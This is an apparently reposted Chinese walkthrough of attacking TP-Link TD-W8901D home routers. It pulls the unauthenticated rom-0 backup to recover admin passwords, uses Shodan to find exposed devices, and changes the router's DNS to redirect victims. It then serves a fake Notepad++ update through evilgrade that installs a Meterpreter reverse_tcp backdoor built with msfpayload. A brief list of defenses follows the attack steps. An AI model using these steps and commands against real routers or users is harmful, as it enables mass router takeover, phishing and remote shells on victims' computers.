TPLINK渗透实战
来源:互联网 发布:sybase 查看数据库的表 编辑:程序博客网 时间:2024/04/28 00:29
from: http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf
0x00 工具
一台笔记本电脑 TD-W8901D路由器(firmware 6.0.0) 虚拟机(WIN7)、Kali Linux(攻击机)、evilgrade(一个模块化的脚本框架,可实现伪造的升级、自带DNS和WEB服务模块,http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt) Metasploit。
0x01 示例
互联网攻击示意图:
局域网攻击示意图
市场上有很多类型的路由器可用,但绝大部分从未升级固件,所以可对大多数家用路由进行这个攻击,在这个项目中使用的是最常见的TPlink路由器。
TPLINK某些版本有一个关键的漏洞:未授权访问Firmware/Romfile界面,无需登陆密码,像这样http://IP//rpFWUpload.html。
同时也可以下载romfile备份文件(rom-0),像这样:http://IP address/rom-0。
步骤一:下载rom文件
下载回来的rom文件需要逆向工程得到明文密码,但有一个更简单的方法,去俄罗斯的一个网站可以解密 http://www.hakim.ws/huawei/rom-0/
步骤二:使用账号密码登陆
第三步:使用搜索引擎SHODAN 搜索RomPager,可在互联网上找到700多万个这种设备
简单的改变一下路由器的DNS,就可以重定向用户的请求,这个方法可以用来钓鱼(从我了解的情况看来,国内已经有大批路由被利用,并已经被黑产用作钓鱼欺诈,黑产表打我,我猜的)。但这个太简单了,作者希望玩的更高(hua)深(shao)一些。
默认DNS的配置是这样:
改成攻击者自己的DNS:
攻击系统:DNS服务器一台、kali预装了evilgrade 和metasploit。
第五步:建一个带后门的payload,给用户发送升级指令。LHOST= 攻击者机器IP和 LPORT =任何开放的端口。
Commad:@@# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.5.132 LPORT=8080 x > navebackdoor.exe
第六步:启动metasploit、运行payload
第七步:设置监听主机和监听端口,命令:set LHOST(攻击者的IP)、set LPORT(监听端口,创建后门时分配的)、exploit(进行攻击)
第八步:启动假的WEB升级服务器evilgrade,执行show modules后,可以看到很多假更新模块,这里选用notepadplus
第九步:show options可以看到模块的使用方法,设置后门升级文件路径使用agent:
Set agent ‘[“<%OUT%>/root/Desktop/navebackdoor.exe<%OUT%>”]’
第十步:完成以上动作后,启动EvilGrade的WEB服务器:
start
第十一步:等受害者打开notepadplus,一旦打开就会弹出要求更新的提示,更新过程中将会加载我们的后门程序。
第十二步:在攻击机器上,evilgrade和Metasploit建立会话,等待返回的shell
第十三步:拿到shell,使用sysinfo查看一下:
输入help可以看到很多命令,包括scrrenshot、killav,运行vnc 等
0x02 防御方法
经常升级你的路由器版本
路由器不要在公网暴露
系统和软件升级时检查证书
设置静态IP,比如google的8.8.8.8、8.8.4.4(广告:阿里巴巴的公共dns 223.5.5.5 和 223.6.6.6)
- TPLINK渗透实战
- TPLINK渗透
- 实战内网渗透
- Linux渗透技巧+实战
- (原创)实战渗透学校
- 浅谈渗透测试实战
- Adobe阅读器渗透实战
- 渗透实战之安全设备踩点
- Metasploit-MSSQL渗透-实战篇
- (原创)实战渗透河北经贸大学
- Kali渗透测试技术实战
- meterpreter详解与渗透实战
- Kali Linux渗透测试实战 1.4 小试牛刀
- Kali Linux渗透测试实战 1.1
- Kali Linux渗透测试实战 1.2
- Kali Linux渗透测试实战 1.3
- Kali Linux渗透测试实战 1.4
- Kali Linux渗透测试实战 2.1
- C++读写ini配置文件
- Eclipse+struts2+spring整合实现登陆功能
- [leetcode] Remove Duplicates from Sorted Array II
- MFC中的菜单操作
- 匿名内部类 this.val$的问题
- TPLINK渗透实战
- 黑马程序员——Java基础3 关于面向对象、封装、多态、继承,以及接口和包
- sleep和wait有什么区别
- hdu 2516 博弈。斐波那契数
- checkbox
- c#对象与json相互转化
- ---------HTTP报文解析
- ActiveReport入门教程(五) - ActiveReport介绍
- 在android studio中新建android gradle project的时候connect refused:connect或者卡在building project...或Refreshing